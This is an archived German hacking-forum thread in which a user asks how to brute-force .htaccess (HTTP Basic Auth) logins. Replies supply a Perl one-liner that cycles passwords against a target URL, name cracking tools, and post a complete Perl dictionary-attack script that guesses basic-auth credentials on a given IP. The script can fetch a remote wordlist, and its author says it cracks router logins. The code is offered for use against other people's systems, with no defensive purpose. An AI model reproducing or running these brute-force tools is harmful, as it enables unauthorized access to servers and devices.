Archiv verlassen und diese Seite im Standarddesign anzeigen : [S] .htaccess brute force
Hey habe Mal ne frage wie kann ich einen htaccess brute forcen ?
Ich will kein User:PW listen usen sondern bruten .
Vielen dank für euere hilfe .
Hier hast du ein Ansatz, wie man ein Bruteforcer in Perl schreibt.
Das verbunden mit einem HTTP Request würde dann ein .htaccess Bruteforcer ergeben.
perl -e '$_=a;print$_++,$/while(1);'
Also ich suche ein Prog oder ein script wie ich ein .htaccess brute forcen kann .
Leider kann ich kein perl deshalb suche ich hier nach einer anderen lösung .
Und nach was für eine anderen Lösung suchst du?
Anon_n00j
28.04.2012, 23:58
oldsch00l johnTheRipper ;D
oder AccessDiver aber sobald ich bruten hoere denn finde ich die chancen immer verschwinden gering ;P ausser der gute Admin 12345 schlägt wieder zu !
mfg n00j
johnTheRipper kenne ich der soll aber nicht gehen hab ich gelesen .
Und nach was für eine anderen Lösung suchst du?
Fertige Scripts oder Programme
Hier hast du ein fertiges Script.
perl -MLWP::UserAgent -e '$a=a;$u=LWP::UserAgent->new;while(1){$r=$u->head("http://username:".$a++."\@url");last,if($r->headers_as_string()!~/.*realm.*/)}$a--;print"pass=$a",$/'Das was fett geschrieben ist, sollte man aber noch anpassen.
Yakuza112
29.04.2012, 22:05
hab mal auf meiner HD bissel gesucht, hier ebenfalls perl
#!/usr/bin/perl
=poc
Simple .htaccess bruteforcer. Could be usefull to crack router logins.
by Perforin
virii.lu
#vxnet
Greetings to everyone from #vxnet and EOF
=cut
use HTTP::Request;
use LWP::UserAgent;
use LWP::Simple;
use File::Temp qw(tempfile);
use strict;
use warnings;
use diagnostics;
my($ip,$user,$dic) = @ARGV;
my($fh, $tmpfile) = tempfile("X" x 23, UNLINK => 1);
my($useragent,$request,$zeile,$_,@data);
if (@ARGV < 3) { help(); }
print <<"INTRO";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.htaccess Bruter by Perforin
virii.lu
#vxnet
~[v1.0]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
INTRO
if ($dic =~ m/--milw0rm/i) {
print "[~] Loading milw0rm wordlist...\n";
getstore('http://milw0rm.com/mil-dic.php',$tmpfile) || die "milw0rm down?!\n";
open(DIC,"<",$tmpfile) || die "Wordlist not found or permission denied!\n";
} else {
open(DIC,"<",$dic) || die "Wordlist not found or permission denied!\n";
}
$useragent = LWP::UserAgent->new;
$request = HTTP::Request->new(GET => 'http://' . $ip);
while(<DIC>) {
chomp($_);
$request->authorization_basic($user, $_);
@data = $useragent->request($request)->as_string;
foreach $zeile (@data) {
if($zeile =~ m/401 Unauthorized/i) {
print "[~] Bruting...\n";
} else {
print "\n[!] Got login!\n";
print "[!] " . $user . ":" . $_ . "\n";
exit;
}
}
}
print "[-] Could not be cracked!\n";
close(DIC);
sub help {
print <<"HELP";
########################################
.htaccess bruter by Perforin
brute.pl 192.168.1.1 admin dic.txt
brute.pl 192.168.1.1 admin --milw0rm
###############[virii.lu]###############
HELP
exit;
}
Ein Wordlist Script ist meiner Meinung nach keine bruteforce Attacke.
Hier wurde aber explizit nach einem gefragt.
Und lieber was eigenes, dann hättest du auch gemerkt das es kei Brutforce ist.
Milw0rm ist doch auch down oder irre ich ?
wenn ich richtig liege, dann wird das script von jakuza112 nicht gehen
da es doch versucht auf milw0rms wordlist zuzugreifen ?
Das ist so nicht korrekt. Man hat die Möglichkeit --milw0rm anzugeben, damit es mit einer Wordlist von denen arbeitet.
Würde aber in diesem Fall nur zu einer Meldung kommen, dass milw0rm nicht erreichbar ist.
Aber man könnte noch seine eigene Wordlist mit angeben, dann würde es ohne Probleme funktionieren.
Auch wenn hier explizit _nicht_ nach einer Wordlist gefragt wurde.
mein fehler, tut mir leid :/
Anon_n00j
01.05.2012, 03:07
@milw0rm
jop milw0rm ist seit jahren down... team inj3ct0r führt des weiter auf 1337days.com
mfg anon_n00j
@cby...
er sucht halt wat zum cracken ;P
Google nach ´AccessDriver in 40 Schritten´
Mit einer Wordlist zu arbeiten ist ratsam, da du dir dadurch viel Zeit gegenüber Bruteforcen sparst.
@cby: Was willst du mit deinen unverständlichen Perl-Codeschnippseln bezwecken? Diese bringen hier keinem etwas und dadurch zu zeigen, was für ein Pro du bist, läuft ebenfalls ins leere.
Hm. Ich weiss nicht wo dein Problem liegt, aber ich habe nur genau die Lösung gebracht die erwartet wurde.
Aber natürlich haben Leute wie du damit ein Problem *stty
Powered by vBulletin® Copyright ©2024 Adduco Digital e.K. und vBulletin Solutions, Inc. Alle Rechte vorbehalten.